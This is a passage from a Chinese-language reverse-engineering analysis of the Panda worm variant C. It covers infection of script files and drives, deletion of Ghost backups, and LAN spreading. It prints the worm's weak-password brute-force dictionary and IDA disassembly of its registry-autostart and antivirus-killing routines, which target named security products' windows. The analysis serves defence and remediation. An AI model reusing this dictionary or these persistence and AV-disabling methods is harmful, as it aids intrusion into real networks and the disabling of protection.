总的来说详细感染部分是这样做的:熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十四搜索机器上的可用分区,然后感染分区中所有的脚本文件(脚本文件类型在概要中已说明).
但是病毒不感染以下文件夹:WINDOWSWINNTsystem32DocumentsandSettingsSystemVolumeInformationRecycledWindowsNTWindowsUpdateWindowsMediaPlayerOutlookExpressInternetExplorerNetMeetingCommonFilesComPlusApplicationsMessengerInstallShieldInstallationInformationMSNMicrosoftFrontpageMovieMakerMSNGaminZone感染后病毒在相应的文件夹中写上已感染标记文件Desktop_.
ini.
再者病毒会删除机器中名缀名为GHO的文件,使得中毒后无法使用ghost还原系统.
CTimer_WITE_AUTORUNINF部分,这部分很简单的,只是简单的将病毒自身复制到各分区根目录下命名为setup.
exe,并生成autorun.
inf文件.
下面进入Infect_NetWork部分,跟进入好几层才出现关键代码,这部分就是病毒进行局域网感染部分(这部分存在一定的危害,因此我不贴详细的分析代码):病毒遍历用户所在的局域网,连接上可用机器时病毒将自身复制到目标机器的以下位置(因系统而异):\DocumentsandSettings\AllUsers\StartMenu\Programs\Startup\\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动\\WINDOWS\StartMenu\Programs\Startup\\WINNT\Profiles\AllUsers\StartMenu\Programs\Startup\病毒病毒名为GameSetup.
exe,然后添加远程任务,同时病毒会尝试对内网中的机器进行弱口令攻击,病毒攻击字典如下:1234、password、6969、harley、123456、golf、pussy、mustang、1111、shadow、1313、fish、5150、7777、qwerty、baseball、2112、letmein、12345678、12345、ccc、admin、5201314、qq520、1、12、123、1234567、123456789、654321、54321、111、000000、abc、pw、11111111、88888888、pass、passwd、database、abcd、abc123、sybase、123qwe、server、computer、520、super、123asd、ihavenopass、godblessyou、enable、xp、2002、2003、2600、alpha、110、111111、121212、123123、1234qwer、123abc、007、a、aaa、patrick、pat、administrator、root、sex、熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十五god、fuckyou、fuck、test、test123、temp、temp123、win、pc、asdf、pwd、qwer、yxcv、zxcv、home、xxx、owner、login、Login、pw123、love、mypc、mypc123、admin123、mypass、mypass123、901100、Administrator、Guest、admin、Root看到上面一堆的弱口令,我相信肯定有人的密码在以上列表中.
弱口令攻击成功后病毒就对目标机器进行病毒感染形为.
到这里为此病毒所有的感染模块都讲完了.
下面讲讲接下来的下载和清除反病毒软件部分:Kill_AV_GetNetInfo:CODE:0040C9F0SUBROUTINECODE:0040C9F0CODE:0040C9F0CODE:0040C9F0Kill_AV_GetNetInfoprocnearCODEXREF:start+A8pstart+A8pCODE:0040C9F0cmpds:dword_40D2B0,0CODE:0040C9F7jzshortloc_40C9FECODE:0040C9F9callsub_40CA5CCODE:0040C9FECODE:0040C9FEloc_40C9FE:CODEXREF:Kill_AV_GetNetInfo+7jKill_AV_GetNetInfo+7jCODE:0040C9FEpushoffsetWirte_AutoRun_ReglpTimerFuncCODE:0040CA03push3E8huElapseCODE:0040CA08push0nIDEventCODE:0040CA0Apush0hWndCODE:0040CA0CcallSetTimerCODE:0040CA11movds:dword_40D2B0,eaxCODE:0040CA16pushoffsetTimer_DownloadlpTimerFuncCODE:0040CA1Bpush124F80huElapseCODE:0040CA20push0nIDEventCODE:0040CA22push0hWndCODE:0040CA24callSetTimerCODE:0040CA29movds:dword_40D2B4,eaxCODE:0040CA2EpushoffsetDownload_and_KillSharelpTimerFuncCODE:0040CA33push2710huElapseCODE:0040CA38push0nIDEventCODE:0040CA3Apush0hWndCODE:0040CA3CcallSetTimerCODE:0040CA41movds:uIDEvent,eaxCODE:0040CA46pushoffsetTimer_kill_AVlpTimerFuncCODE:0040CA4Bpush1770huElapseCODE:0040CA50push0nIDEventCODE:0040CA52push0hWndCODE:0040CA54callSetTimerCODE:0040CA59retn熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十六CODE:0040CA59Kill_AV_GetNetInfoendpCODE:0040CA59CODE:0040CA59每个模块的细节如下:写入注册表自启动项:CODE:0040C84CSUBROUTINECODE:0040C84CCODE:0040C84CAttributes:bpbasedframeCODE:0040C84CCODE:0040C84Cvoid__stdcallWirte_AutoRun_Reg(HWND,UINT,UINT,DWORD)CODE:0040C84CWirte_AutoRun_RegprocnearDATAXREF:Kill_AV_GetNetInfo:loc_40C9FEoKill_AV_GetNetInfo:loc_40C9FEoCODE:0040C84CCODE:0040C84Cvar_8=dwordptr8CODE:0040C84Cvar_4=dwordptr4CODE:0040C84CCODE:0040C84CpushebpCODE:0040C84Dmovebp,espCODE:0040C84Fpush0CODE:0040C851push0CODE:0040C853xoreax,eaxCODE:0040C855pushebpCODE:0040C856pushoffsetj_@System@@HandleFinally$qqrv_36CODE:0040C85Bpushdwordptrfs:[eax]CODE:0040C85Emovfs:[eax],espCODE:0040C861callKill_AV_ProcessCODE:0040C866leaeax,[ebp+var_8]CODE:0040C869callGetSysDirCODE:0040C86Epush[ebp+var_8]CODE:0040C871pushoffsetaDrivers_0"drivers\\"CODE:0040C876pushoffsetaSpoclsv_exe_0"spoclsv.
exe"CODE:0040C87Bleaeax,[ebp+var_4]CODE:0040C87Emovedx,3CODE:0040C883call@System@@LStrCatN$qqrvCODE:0040C888moveax,[ebp+var_4]CODE:0040C88Bcall@System@@LStrToPChar$qqrx17System@AnsiStringCODE:0040C890pusheaxintCODE:0040C891movecx,offsetaSvcshare"svcshare"CODE:0040C896movedx,offsetaSoftwareMicros"Software\\Microsoft\\Windows\\CurrentVersi".
.
.
CODE:0040C89Bmoveax,HKEY_CURRENT_USER熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十七CODE:0040C8A0callWrite_RegCODE:0040C8A5xorecx,ecxCODE:0040C8A7movedx,offsetaSoftwareMicr_0"SOFTWARE\\Microsoft\\Windows\\CurrentVersi".
.
.
CODE:0040C8ACmoveax,HKEY_LOCAL_MACHINECODE:0040C8B1callsub_405B00CODE:0040C8B6xoreax,eaxCODE:0040C8B8popedxCODE:0040C8B9popecxCODE:0040C8BApopecxCODE:0040C8BBmovfs:[eax],edxCODE:0040C8BEpushoffsetloc_40C8D8CODE:0040C8C3CODE:0040C8C3loc_40C8C3:CODEXREF:CODE:0040C8D6jCODE:0040C8D6jCODE:0040C8C3leaeax,[ebp+var_8]CODE:0040C8C6movedx,2CODE:0040C8CBcall@System@@LStrArrayClr$qqrpviCODE:0040C8D0retnCODE:0040C8D0Wirte_AutoRun_Regendpsp=1Ch再跟进Kill_AV_Process:CODE:004062C8SUBROUTINECODE:004062C8CODE:004062C8Attributes:bpbasedframeCODE:004062C8CODE:004062C8DWORD__stdcallThread_Kill_av(LPVOID)CODE:004062C8Thread_Kill_avprocnearDATAXREF:Kill_AV_Process+6oKill_AV_Process+6oCODE:004062C8CODE:004062C8var_F0=dwordptr0F0hCODE:004062C8var_EC=dwordptr0EChCODE:004062C8var_E8=dwordptr0E8hCODE:004062C8var_E4=dwordptr0E4hCODE:004062C8var_E0=dwordptr0E0hCODE:004062C8var_DC=dwordptr0DChCODE:004062C8var_D8=dwordptr0D8hCODE:004062C8var_D4=dwordptr0D4hCODE:004062C8var_D0=dwordptr0D0hCODE:004062C8var_CC=dwordptr0CChCODE:004062C8var_C8=dwordptr0C8hCODE:004062C8var_C4=dwordptr0C4h熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十八CODE:004062C8var_C0=dwordptr0C0hCODE:004062C8var_BC=dwordptr0BChCODE:004062C8var_B8=dwordptr0B8hCODE:004062C8var_B4=dwordptr0B4hCODE:004062C8var_B0=dwordptr0B0hCODE:004062C8var_AC=dwordptr0AChCODE:004062C8var_A8=dwordptr0A8hCODE:004062C8var_A4=dwordptr0A4hCODE:004062C8var_A0=dwordptr0A0hCODE:004062C8var_9C=dwordptr9ChCODE:004062C8var_98=dwordptr98hCODE:004062C8var_94=dwordptr94hCODE:004062C8var_90=dwordptr90hCODE:004062C8var_8C=dwordptr8ChCODE:004062C8var_88=dwordptr88hCODE:004062C8var_84=dwordptr84hCODE:004062C8var_80=dwordptr80hCODE:004062C8var_7C=dwordptr7ChCODE:004062C8var_78=dwordptr78hCODE:004062C8var_74=dwordptr74hCODE:004062C8var_70=dwordptr70hCODE:004062C8var_6C=dwordptr6ChCODE:004062C8var_66=dwordptr66hCODE:004062C8CODE:004062C8pushebpCODE:004062C9movebp,espCODE:004062CBmovecx,1EhCODE:004062D0CODE:004062D0loc_4062D0:CODEXREF:Thread_Kill_av+DjThread_Kill_av+DjCODE:004062D0push0CODE:004062D2push0CODE:004062D4dececxCODE:004062D5jnzshortloc_4062D0CODE:004062D7pushebxCODE:004062D8pushesiCODE:004062D9pushediCODE:004062DAleaesi,[ebp+var_66+1]CODE:004062DDxoreax,eaxCODE:004062DFpushebpCODE:004062E0pushoffsetj_@System@@HandleFinally$qqrv_14CODE:004062E5pushdwordptrfs:[eax]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十九CODE:004062E8movfs:[eax],espCODE:004062EBcallAdjustPCODE:004062F0xorebx,ebxCODE:004062F2callGetDesktopWindowCODE:004062F7movedi,eaxCODE:004062F9CODE:004062F9loc_4062F9:CODEXREF:Thread_Kill_av+697jThread_Kill_av+697jCODE:004062F9push0LPCSTRCODE:004062FBpush0LPCSTRCODE:004062FDpushebxHWNDCODE:004062FEpushediHWNDCODE:004062FFcallFindWindowExACODE:00406304movebx,eaxCODE:00406306push65hnMaxCountCODE:00406308pushesilpStringCODE:00406309pushebxhWndCODE:0040630AcallGetWindowTextACODE:0040630Fleaeax,[ebp+var_6C]CODE:00406312movedx,esiCODE:00406314movecx,65hCODE:00406319call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040631Emovedx,[ebp+var_6C]CODE:00406321moveax,offsetasc_406C08"天网"CODE:00406326call@System@@LStrPos$qqrvCODE:0040632Btesteax,eaxCODE:0040632Djzshortloc_40633BCODE:0040632Fpush0lParamCODE:00406331push0wParamCODE:00406333push12hMsgCODE:00406335pushebxhWndCODE:00406336callPostMessageACODE:0040633BCODE:0040633Bloc_40633B:CODEXREF:Thread_Kill_av+65jThread_Kill_av+65jCODE:0040633Bleaeax,[ebp+var_70]CODE:0040633Emovedx,esiCODE:00406340movecx,65hCODE:00406345call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040634Amovedx,[ebp+var_70]CODE:0040634Dmoveax,offsetasc_406C18"防火墙"CODE:00406352call@System@@LStrPos$qqrv熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十CODE:00406357testeax,eaxCODE:00406359jzshortloc_406367CODE:0040635Bpush0lParamCODE:0040635Dpush0wParamCODE:0040635Fpush12hMsgCODE:00406361pushebxhWndCODE:00406362callPostMessageACODE:00406367CODE:00406367loc_406367:CODEXREF:Thread_Kill_av+91jThread_Kill_av+91jCODE:00406367leaeax,[ebp+var_74]CODE:0040636Amovedx,esiCODE:0040636Cmovecx,65hCODE:00406371call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406376movedx,[ebp+var_74]CODE:00406379moveax,offsetasc_406C28"进程"CODE:0040637Ecall@System@@LStrPos$qqrvCODE:00406383testeax,eaxCODE:00406385jzshortloc_406393CODE:00406387push0lParamCODE:00406389push0wParamCODE:0040638BpushWM_QUITMsgCODE:0040638DpushebxhWndCODE:0040638EcallPostMessageACODE:00406393CODE:00406393loc_406393:CODEXREF:Thread_Kill_av+BDjThread_Kill_av+BDjCODE:00406393leaeax,[ebp+var_78]CODE:00406396movedx,esiCODE:00406398movecx,65hCODE:0040639Dcall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004063A2movedx,[ebp+var_78]CODE:004063A5moveax,offsetaVirusscan"VirusScan"CODE:004063AAcall@System@@LStrPos$qqrvCODE:004063AFtesteax,eaxCODE:004063B1jzshortloc_4063BFCODE:004063B3push0lParamCODE:004063B5push0wParamCODE:004063B7push12hMsgCODE:004063B9pushebxhWndCODE:004063BAcallPostMessageA熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十一CODE:004063BFCODE:004063BFloc_4063BF:CODEXREF:Thread_Kill_av+E9jThread_Kill_av+E9jCODE:004063BFleaeax,[ebp+var_7C]CODE:004063C2movedx,esiCODE:004063C4movecx,65hCODE:004063C9call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004063CEmovedx,[ebp+var_7C]CODE:004063D1moveax,offsetaNod32"NOD32"CODE:004063D6call@System@@LStrPos$qqrvCODE:004063DBtesteax,eaxCODE:004063DDjzshortloc_4063EBCODE:004063DFpush0lParamCODE:004063E1push0wParamCODE:004063E3push12hMsgCODE:004063E5pushebxhWndCODE:004063E6callPostMessageACODE:004063EBCODE:004063EBloc_4063EB:CODEXREF:Thread_Kill_av+115jThread_Kill_av+115jCODE:004063EBleaeax,[ebp+var_80]CODE:004063EEmovedx,esiCODE:004063F0movecx,65hCODE:004063F5call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004063FAmovedx,[ebp+var_80]CODE:004063FDmoveax,offsetaQ"网镖"CODE:00406402call@System@@LStrPos$qqrvCODE:00406407testeax,eaxCODE:00406409jzshortloc_406417CODE:0040640Bpush0lParamCODE:0040640Dpush0wParamCODE:0040640Fpush12hMsgCODE:00406411pushebxhWndCODE:00406412callPostMessageACODE:00406417CODE:00406417loc_406417:CODEXREF:Thread_Kill_av+141jThread_Kill_av+141jCODE:00406417leaeax,[ebp+var_84]CODE:0040641Dmovedx,esiCODE:0040641Fmovecx,65hCODE:00406424call@System@@LStrFromArray$qqrr17System@AnsiStringpci熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十二CODE:00406429movedx,[ebp+var_84]CODE:0040642Fmoveax,offsetasc_406C6C"杀毒"CODE:00406434call@System@@LStrPos$qqrvCODE:00406439testeax,eaxCODE:0040643Bjzshortloc_406449CODE:0040643Dpush0lParamCODE:0040643Fpush0wParamCODE:00406441push12hMsgCODE:00406443pushebxhWndCODE:00406444callPostMessageACODE:00406449CODE:00406449loc_406449:CODEXREF:Thread_Kill_av+173jThread_Kill_av+173jCODE:00406449leaeax,[ebp+var_88]CODE:0040644Fmovedx,esiCODE:00406451movecx,65hCODE:00406456call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040645Bmovedx,[ebp+var_88]CODE:00406461moveax,offsetasc_406C7C"毒霸"CODE:00406466call@System@@LStrPos$qqrvCODE:0040646Btesteax,eaxCODE:0040646Djzshortloc_40647BCODE:0040646Fpush0lParamCODE:00406471push0wParamCODE:00406473push12hMsgCODE:00406475pushebxhWndCODE:00406476callPostMessageACODE:0040647BCODE:0040647Bloc_40647B:CODEXREF:Thread_Kill_av+1A5jThread_Kill_av+1A5jCODE:0040647Bleaeax,[ebp+var_8C]CODE:00406481movedx,esiCODE:00406483movecx,65hCODE:00406488call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040648Dmovedx,[ebp+var_8C]CODE:00406493moveax,offsetasc_406C8C"瑞星"CODE:00406498call@System@@LStrPos$qqrvCODE:0040649Dtesteax,eaxCODE:0040649Fjzshortloc_4064ADCODE:004064A1push0lParamCODE:004064A3push0wParamCODE:004064A5push12hMsg熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十三CODE:004064A7pushebxhWndCODE:004064A8callPostMessageACODE:004064ADCODE:004064ADloc_4064AD:CODEXREF:Thread_Kill_av+1D7jThread_Kill_av+1D7jCODE:004064ADleaeax,[ebp+var_90]CODE:004064B3movedx,esiCODE:004064B5movecx,65hCODE:004064BAcall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004064BFmovedx,[ebp+var_90]CODE:004064C5moveax,offsetaN"江民"CODE:004064CAcall@System@@LStrPos$qqrvCODE:004064CFtesteax,eaxCODE:004064D1jzshortloc_4064DFCODE:004064D3push0lParamCODE:004064D5push0wParamCODE:004064D7push12hMsgCODE:004064D9pushebxhWndCODE:004064DAcallPostMessageACODE:004064DFCODE:004064DFloc_4064DF:CODEXREF:Thread_Kill_av+209jThread_Kill_av+209jCODE:004064DFleaeax,[ebp+var_94]CODE:004064E5movedx,esiCODE:004064E7movecx,65hCODE:004064ECcall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004064F1movedx,[ebp+var_94]CODE:004064F7moveax,offsetaIe"黄山IE"CODE:004064FCcall@System@@LStrPos$qqrvCODE:00406501testeax,eaxCODE:00406503jzshortloc_406511CODE:00406505push0lParamCODE:00406507push0wParamCODE:00406509push12hMsgCODE:0040650BpushebxhWndCODE:0040650CcallPostMessageACODE:00406511CODE:00406511loc_406511:CODEXREF:Thread_Kill_av+23BjThread_Kill_av+23BjCODE:00406511leaeax,[ebp+var_98]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十四CODE:00406517movedx,esiCODE:00406519movecx,65hCODE:0040651Ecall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406523movedx,[ebp+var_98]CODE:00406529moveax,offsetaM"超级兔子"CODE:0040652Ecall@System@@LStrPos$qqrvCODE:00406533testeax,eaxCODE:00406535jzshortloc_406543CODE:00406537push0lParamCODE:00406539push0wParamCODE:0040653Bpush12hMsgCODE:0040653DpushebxhWndCODE:0040653EcallPostMessageACODE:00406543CODE:00406543loc_406543:CODEXREF:Thread_Kill_av+26DjThread_Kill_av+26DjCODE:00406543leaeax,[ebp+var_9C]CODE:00406549movedx,esiCODE:0040654Bmovecx,65hCODE:00406550call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406555movedx,[ebp+var_9C]CODE:0040655Bmoveax,offsetaPJ"优化大师"CODE:00406560call@System@@LStrPos$qqrvCODE:00406565testeax,eaxCODE:00406567jzshortloc_406575CODE:00406569push0lParamCODE:0040656Bpush0wParamCODE:0040656Dpush12hMsgCODE:0040656FpushebxhWndCODE:00406570callPostMessageACODE:00406575CODE:00406575loc_406575:CODEXREF:Thread_Kill_av+29FjThread_Kill_av+29FjCODE:00406575leaeax,[ebp+var_A0]CODE:0040657Bmovedx,esiCODE:0040657Dmovecx,65hCODE:00406582call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406587movedx,[ebp+var_A0]CODE:0040658Dmoveax,offsetaAX"木马清道夫"CODE:00406592call@System@@LStrPos$qqrvCODE:00406597testeax,eax熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十五CODE:00406599jzshortloc_4065A7CODE:0040659Bpush0lParamCODE:0040659Dpush0wParamCODE:0040659Fpush12hMsgCODE:004065A1pushebxhWndCODE:004065A2callPostMessageACODE:004065A7CODE:004065A7loc_4065A7:CODEXREF:Thread_Kill_av+2D1jThread_Kill_av+2D1jCODE:004065A7leaeax,[ebp+var_A4]CODE:004065ADmovedx,esiCODE:004065AFmovecx,65hCODE:004065B4call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004065B9movedx,[ebp+var_A4]CODE:004065BFmoveax,offsetaRX"木馬清道夫"CODE:004065C4call@System@@LStrPos$qqrvCODE:004065C9testeax,eaxCODE:004065CBjzshortloc_4065D9CODE:004065CDpush0lParamCODE:004065CFpush0wParamCODE:004065D1push12hMsgCODE:004065D3pushebxhWndCODE:004065D4callPostMessageACODE:004065D9CODE:004065D9loc_4065D9:CODEXREF:Thread_Kill_av+303jThread_Kill_av+303jCODE:004065D9leaeax,[ebp+var_A8]CODE:004065DFmovedx,esiCODE:004065E1movecx,65hCODE:004065E6call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004065EBmovedx,[ebp+var_A8]CODE:004065F1moveax,offsetaQqB"QQ病毒"CODE:004065F6call@System@@LStrPos$qqrvCODE:004065FBtesteax,eaxCODE:004065FDjzshortloc_40660BCODE:004065FFpush0lParamCODE:00406601push0wParamCODE:00406603push12hMsgCODE:00406605pushebxhWndCODE:00406606callPostMessageA熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十六CODE:0040660BCODE:0040660Bloc_40660B:CODEXREF:Thread_Kill_av+335jThread_Kill_av+335jCODE:0040660Bleaeax,[ebp+var_AC]CODE:00406611movedx,esiCODE:00406613movecx,65hCODE:00406618call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040661Dmovedx,[ebp+var_AC]CODE:00406623moveax,offsetaVSARN"注册表编辑器"CODE:00406628call@System@@LStrPos$qqrvCODE:0040662Dtesteax,eaxCODE:0040662Fjzshortloc_40663DCODE:00406631push0lParamCODE:00406633push0wParamCODE:00406635push12hMsgCODE:00406637pushebxhWndCODE:00406638callPostMessageACODE:0040663DCODE:0040663Dloc_40663D:CODEXREF:Thread_Kill_av+367jThread_Kill_av+367jCODE:0040663Dleaeax,[ebp+var_B0]CODE:00406643movedx,esiCODE:00406645movecx,65hCODE:0040664Acall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040664Fmovedx,[ebp+var_B0]CODE:00406655moveax,offsetaF_2"系统配置实用程序"CODE:0040665Acall@System@@LStrPos$qqrvCODE:0040665Ftesteax,eaxCODE:00406661jzshortloc_40666FCODE:00406663push0lParamCODE:00406665push0wParamCODE:00406667push12hMsgCODE:00406669pushebxhWndCODE:0040666AcallPostMessageACODE:0040666FCODE:0040666Floc_40666F:CODEXREF:Thread_Kill_av+399jThread_Kill_av+399jCODE:0040666Fleaeax,[ebp+var_B4]CODE:00406675movedx,esiCODE:00406677movecx,65hCODE:0040667Ccall熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十七@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406681movedx,[ebp+var_B4]CODE:00406687moveax,offsetaIB"卡巴斯基反病毒"CODE:0040668Ccall@System@@LStrPos$qqrvCODE:00406691testeax,eaxCODE:00406693jzshortloc_4066A1CODE:00406695push0lParamCODE:00406697push0wParamCODE:00406699push12hMsgCODE:0040669BpushebxhWndCODE:0040669CcallPostMessageACODE:004066A1CODE:004066A1loc_4066A1:CODEXREF:Thread_Kill_av+3CBjThread_Kill_av+3CBjCODE:004066A1leaeax,[ebp+var_B8]CODE:004066A7movedx,esiCODE:004066A9movecx,65hCODE:004066AEcall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004066B3movedx,[ebp+var_B8]CODE:004066B9moveax,offsetaSymantecAntivi"SymantecAntiVirus"CODE:004066BEcall@System@@LStrPos$qqrvCODE:004066C3testeax,eaxCODE:004066C5jzshortloc_4066D3CODE:004066C7push0lParamCODE:004066C9push0wParamCODE:004066CBpush12hMsgCODE:004066CDpushebxhWndCODE:004066CEcallPostMessageACODE:004066D3CODE:004066D3loc_4066D3:CODEXREF:Thread_Kill_av+3FDjThread_Kill_av+3FDjCODE:004066D3leaeax,[ebp+var_BC]CODE:004066D9movedx,esiCODE:004066DBmovecx,65hCODE:004066E0call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004066E5movedx,[ebp+var_BC]CODE:004066EBmoveax,offsetaDuba"Duba"CODE:004066F0call@System@@LStrPos$qqrvCODE:004066F5testeax,eaxCODE:004066F7jzshortloc_406705熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十八CODE:004066F9push0lParamCODE:004066FBpush0wParamCODE:004066FDpush12hMsgCODE:004066FFpushebxhWndCODE:00406700callPostMessageACODE:00406705CODE:00406705loc_406705:CODEXREF:Thread_Kill_av+42FjThread_Kill_av+42FjCODE:00406705leaeax,[ebp+var_C0]CODE:0040670Bmovedx,esiCODE:0040670Dmovecx,65hCODE:00406712call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406717movedx,[ebp+var_C0]CODE:0040671Dmoveax,offsetaWindowsA"Windows任务管理器"CODE:00406722call@System@@LStrPos$qqrvCODE:00406727testeax,eaxCODE:00406729jzshortloc_406737CODE:0040672Bpush0lParamCODE:0040672Dpush0wParamCODE:0040672Fpush12hMsgCODE:00406731pushebxhWndCODE:00406732callPostMessageACODE:00406737CODE:00406737loc_406737:CODEXREF:Thread_Kill_av+461jThread_Kill_av+461jCODE:00406737leaeax,[ebp+var_C4]CODE:0040673Dmovedx,esiCODE:0040673Fmovecx,65hCODE:00406744call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406749movedx,[ebp+var_C4]CODE:0040674Fmoveax,offsetaQqB"QQ病毒"CODE:00406754call@System@@LStrPos$qqrvCODE:00406759testeax,eaxCODE:0040675Bjzshortloc_406769CODE:0040675Dpush0lParamCODE:0040675Fpush0wParamCODE:00406761push12hMsgCODE:00406763pushebxhWndCODE:00406764callPostMessageACODE:00406769CODE:00406769loc_406769:CODEXREF:Thread_Kill_av+493jThread_Kill_av+493j熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四十九CODE:00406769leaeax,[ebp+var_C8]CODE:0040676Fmovedx,esiCODE:00406771movecx,65hCODE:00406776call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040677Bmovedx,[ebp+var_C8]CODE:00406781moveax,offsetaEsteemProcs"esteemprocs"CODE:00406786call@System@@LStrPos$qqrvCODE:0040678Btesteax,eaxCODE:0040678Djzshortloc_40679BCODE:0040678Fpush0lParamCODE:00406791push0wParamCODE:00406793push12hMsgCODE:00406795pushebxhWndCODE:00406796callPostMessageACODE:0040679BCODE:0040679Bloc_40679B:CODEXREF:Thread_Kill_av+4C5jThread_Kill_av+4C5jCODE:0040679Bleaeax,[ebp+var_CC]CODE:004067A1movedx,esiCODE:004067A3movecx,65hCODE:004067A8call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004067ADmovedx,[ebp+var_CC]CODE:004067B3moveax,offsetaEpc"绿鹰PC"CODE:004067B8call@System@@LStrPos$qqrvCODE:004067BDtesteax,eaxCODE:004067BFjzshortloc_4067CDCODE:004067C1push0lParamCODE:004067C3push0wParamCODE:004067C5push12hMsgCODE:004067C7pushebxhWndCODE:004067C8callPostMessageACODE:004067CDCODE:004067CDloc_4067CD:CODEXREF:Thread_Kill_av+4F7jThread_Kill_av+4F7jCODE:004067CDleaeax,[ebp+var_D0]CODE:004067D3movedx,esiCODE:004067D5movecx,65hCODE:004067DAcall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004067DFmovedx,[ebp+var_D0]CODE:004067E5moveax,offsetaI"密码防盗"熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net五十CODE:004067EAcall@System@@LStrPos$qqrvCODE:004067EFtesteax,eaxCODE:004067F1jzshortloc_4067FFCODE:004067F3push0lParamCODE:004067F5push0wParamCODE:004067F7push12hMsgCODE:004067F9pushebxhWndCODE:004067FAcallPostMessageACODE:004067FFCODE:004067FFloc_4067FF:CODEXREF:Thread_Kill_av+529jThread_Kill_av+529jCODE:004067FFleaeax,[ebp+var_D4]CODE:00406805movedx,esiCODE:00406807movecx,65hCODE:0040680Ccall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406811movedx,[ebp+var_D4]CODE:00406817moveax,offsetasc_406DEC"噬菌体"CODE:0040681Ccall@System@@LStrPos$qqrvCODE:00406821testeax,eaxCODE:00406823jzshortloc_406831CODE:00406825push0lParamCODE:00406827push0wParamCODE:00406829push12hMsgCODE:0040682BpushebxhWndCODE:0040682CcallPostMessageACODE:00406831CODE:00406831loc_406831:CODEXREF:Thread_Kill_av+55BjThread_Kill_av+55BjCODE:00406831leaeax,[ebp+var_D8]CODE:00406837movedx,esiCODE:00406839movecx,65hCODE:0040683Ecall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406843movedx,[ebp+var_D8]CODE:00406849moveax,offsetaAIS"木马辅助查找器"CODE:0040684Ecall@System@@LStrPos$qqrvCODE:00406853testeax,eaxCODE:00406855jzshortloc_406863CODE:00406857push0lParamCODE:00406859push0wParamCODE:0040685Bpush12hMsg熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net五十一CODE:0040685DpushebxhWndCODE:0040685EcallPostMessageACODE:00406863CODE:00406863loc_406863:CODEXREF:Thread_Kill_av+58DjThread_Kill_av+58DjCODE:00406863leaeax,[ebp+var_DC]CODE:00406869movedx,esiCODE:0040686Bmovecx,65hCODE:00406870call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:00406875movedx,[ebp+var_DC]CODE:0040687Bmoveax,offsetaSystemSafetyMo"SystemSafetyMonitor"CODE:00406880call@System@@LStrPos$qqrvCODE:00406885testeax,eaxCODE:00406887jzshortloc_406895CODE:00406889push0lParamCODE:0040688Bpush0wParamCODE:0040688Dpush12hMsgCODE:0040688FpushebxhWndCODE:00406890callPostMessageACODE:00406895CODE:00406895loc_406895:CODEXREF:Thread_Kill_av+5BFjThread_Kill_av+5BFjCODE:00406895leaeax,[ebp+var_E0]CODE:0040689Bmovedx,esiCODE:0040689Dmovecx,65hCODE:004068A2call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004068A7movedx,[ebp+var_E0]CODE:004068ADmoveax,offsetaWrappedGiftKil"WrappedgiftKiller"CODE:004068B2call@System@@LStrPos$qqrvCODE:004068B7testeax,eaxCODE:004068B9jzshortloc_4068C7CODE:004068BBpush0